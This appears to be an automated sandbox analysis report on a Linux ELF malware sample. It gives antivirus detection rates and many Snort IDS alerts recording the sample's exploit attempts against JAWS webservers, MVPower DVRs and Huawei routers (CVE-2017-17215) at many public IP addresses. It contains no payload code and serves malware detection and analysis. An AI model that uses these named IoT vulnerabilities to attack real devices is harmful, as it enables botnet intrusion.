      Timestamp:192.168.2.23135.125.212.234662802025883 01/26/24-15:32:32.808841
      SID:2025883
      Source Port:34662
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23217.92.41.22753160802025883 01/26/24-15:31:12.833746
      SID:2025883
      Source Port:53160
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.220.88.19653468802025883 01/26/24-15:31:55.747068
      SID:2025883
      Source Port:53468
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23170.84.253.6948154802030092 01/26/24-15:31:51.813606
      SID:2030092
      Source Port:48154
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2344.205.91.11556454802030092 01/26/24-15:32:38.536898
      SID:2030092
      Source Port:56454
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.81.5.20748658802025883 01/26/24-15:31:55.581361
      SID:2025883
      Source Port:48658
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.235.130.129.7859124802025883 01/26/24-15:32:41.767636
      SID:2025883
      Source Port:59124
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23120.46.144.12043272802030092 01/26/24-15:32:10.106479
      SID:2030092
      Source Port:43272
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23149.91.88.4733390802025883 01/26/24-15:32:23.589503
      SID:2025883
      Source Port:33390
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23103.221.252.5251938802025883 01/26/24-15:32:32.832220
      SID:2025883
      Source Port:51938
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.20.25.840230802025883 01/26/24-15:32:01.591473
      SID:2025883
      Source Port:40230
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2389.161.183.3245298802025883 01/26/24-15:32:47.933137
      SID:2025883
      Source Port:45298
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2389.232.184.7048042802030092 01/26/24-15:32:12.076459
      SID:2030092
      Source Port:48042
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.93.14353014802030092 01/26/24-15:31:41.558394
      SID:2030092
      Source Port:53014
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.107.149.20444228802030092 01/26/24-15:31:47.457328
      SID:2030092
      Source Port:44228
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2381.60.196.10654910802030092 01/26/24-15:31:50.047490
      SID:2030092
      Source Port:54910
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2373.158.248.14835134802025883 01/26/24-15:31:12.643416
      SID:2025883
      Source Port:35134
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23161.47.33.18353088802025883 01/26/24-15:32:15.824991
      SID:2025883
      Source Port:53088
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Cm1FNv3k5V.elfReversingLabs: Detection: 52%
      Source: Cm1FNv3k5V.elfVirustotal: Detection: 46%Perma Link
      Source: Cm1FNv3k5V.elfJoe Sandbox ML: detected

      Networking

      barindex
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42880 -> 207.58.183.9:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51554 -> 173.194.223.120:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32940 -> 76.164.156.11:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56140 -> 104.24.252.73:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38332 -> 173.26.90.116:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42880 -> 207.58.183.9:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48038 -> 13.35.117.247:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41948 -> 108.157.169.26:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51554 -> 173.194.223.120:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56140 -> 104.24.252.73:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32940 -> 76.164.156.11:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39926 -> 212.36.196.9:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60688 -> 192.169.174.230:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38332 -> 173.26.90.116:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46740 -> 178.68.44.83:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48038 -> 13.35.117.247:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41948 -> 108.157.169.26:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46800 -> 18.164.249.78:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60688 -> 192.169.174.230:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39926 -> 212.36.196.9:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47338 -> 121.126.118.102:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46740 -> 178.68.44.83:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46800 -> 18.164.249.78:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57112 -> 35.247.250.109:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47338 -> 121.126.118.102:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57112 -> 35.247.250.109:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48266 -> 108.156.62.157:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60932 -> 79.132.142.45:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45198 -> 217.73.134.197:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48266 -> 108.156.62.157:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60932 -> 79.132.142.45:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59160 -> 93.213.121.254:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45198 -> 217.73.134.197:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59246 -> 52.142.126.88:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59246 -> 52.142.126.88:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59160 -> 93.213.121.254:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47940 -> 190.166.87.167:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38134 -> 2.21.165.219:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47940 -> 190.166.87.167:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58814 -> 121.144.178.31:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59674 -> 167.114.61.39:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37802 -> 149.202.117.76:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38134 -> 2.21.165.219:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59674 -> 167.114.61.39:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58374 -> 23.235.205.38:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35892 -> 188.51.163.76:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35134 -> 73.158.248.148:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37802 -> 149.202.117.76:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58374 -> 23.235.205.38:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39250 -> 52.57.190.25:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35134 -> 73.158.248.148:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53160 -> 217.92.41.227:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35892 -> 188.51.163.76:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36832 -> 154.80.190.131:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39250 -> 52.57.190.25:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46070 -> 52.196.131.232:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59336 -> 120.78.196.165:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53160 -> 217.92.41.227:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36832 -> 154.80.190.131:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58848 -> 156.254.90.177:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58848 -> 156.254.90.177:37215
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46070 -> 52.196.131.232:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49042 -> 156.241.74.112:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49042 -> 156.241.74.112:37215
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59336 -> 120.78.196.165:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53286 -> 69.85.94.246:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45922 -> 64.182.87.59:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53824 -> 18.154.51.165:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53286 -> 69.85.94.246:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45922 -> 64.182.87.59:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45120 -> 45.135.232.5:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36380 -> 46.23.188.55:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48598 -> 115.42.222.131:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53824 -> 18.154.51.165:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58814 -> 121.144.178.31:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41060 -> 43.140.243.56:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45120 -> 45.135.232.5:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36380 -> 46.23.188.55:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41060 -> 43.140.243.56:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60054 -> 108.186.223.74:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60054 -> 108.186.223.74:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46586 -> 206.189.92.216:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37304 -> 163.5.153.176:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46586 -> 206.189.92.216:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37304 -> 163.5.153.176:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44144 -> 171.236.63.233:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44144 -> 171.236.63.233:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56146 -> 104.119.82.87:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32972 -> 73.223.88.249:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43748 -> 54.69.13.28:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55714 -> 96.7.144.131:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35718 -> 23.194.29.144:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50688 -> 61.238.90.227:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56146 -> 104.119.82.87:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32972 -> 73.223.88.249:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43748 -> 54.69.13.28:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55714 -> 96.7.144.131:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35718 -> 23.194.29.144:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50688 -> 61.238.90.227:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33144 -> 38.238.9.35:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33144 -> 38.238.9.35:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47000 -> 167.82.11.166:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32932 -> 192.145.232.198:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46164 -> 20.157.170.49:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47000 -> 167.82.11.166:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43058 -> 8.209.240.13:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32932 -> 192.145.232.198:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49038 -> 43.248.130.254:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46164 -> 20.157.170.49:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43058 -> 8.209.240.13:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44052 -> 165.95.154.158:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55670 -> 142.252.201.247:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44052 -> 165.95.154.158:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55670 -> 142.252.201.247:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39032 -> 89.117.50.160:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55240 -> 107.148.114.65:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60742 -> 154.38.87.56:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39032 -> 89.117.50.160:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60426 -> 23.8.146.169:80
      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52330 -> 156.241.113.196:37215
      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52330 -> 156.241.113.196:37215
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59280 -> 156.250.15.73:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55240 -> 107.148.114.65:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60742 -> 154.38.87.56:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60426 -> 23.8.146.169:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59280 -> 156.250.15.73:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56354 -> 88.221.24.10:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51262 -> 210.76.76.69:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39916 -> 184.50.79.23:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37724 -> 103.123.4.80:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56354 -> 88.221.24.10:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43562 -> 212.107.17.53:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39778 -> 210.71.232.177:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39916 -> 184.50.79.23:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43562 -> 212.107.17.53:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37724 -> 103.123.4.80:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39778 -> 210.71.232.177:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59358 -> 156.250.15.73:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37420 -> 23.65.32.133:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55064 -> 168.76.22.169:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50582 -> 185.114.96.70:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53630 -> 18.66.93.40:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37420 -> 23.65.32.133:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59358 -> 156.250.15.73:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50582 -> 185.114.96.70:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53630 -> 18.66.93.40:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36186 -> 197.188.167.59:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55064 -> 168.76.22.169:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46056 -> 34.199.210.51:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46376 -> 108.138.167.144:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50392 -> 208.69.96.80:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41192 -> 51.222.111.201:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46056 -> 34.199.210.51:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46376 -> 108.138.167.144:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39076 -> 200.51.44.254:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36186 -> 197.188.167.59:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40348 -> 222.99.0.2:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41192 -> 51.222.111.201:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50392 -> 208.69.96.80:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51830 -> 23.202.233.185:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52410 -> 69.90.160.254:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42328 -> 34.66.136.200:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38206 -> 216.152.233.168:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56696 -> 54.201.62.190:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51830 -> 23.202.233.185:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52410 -> 69.90.160.254:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42328 -> 34.66.136.200:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40348 -> 222.99.0.2:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38206 -> 216.152.233.168:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56696 -> 54.201.62.190:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42280 -> 221.112.50.92:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49378 -> 23.79.19.103:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45966 -> 134.209.129.204:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47214 -> 100.40.152.34:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56648 -> 107.172.253.175:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47744 -> 184.24.204.48:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52530 -> 178.16.125.78:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49378 -> 23.79.19.103:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59922 -> 201.28.145.114:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60212 -> 2.23.6.50:80
      Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45362 -> 212.76.114.212:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45966 -> 134.209.129.204:80
      Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47214 -> 100.40.152.34:80
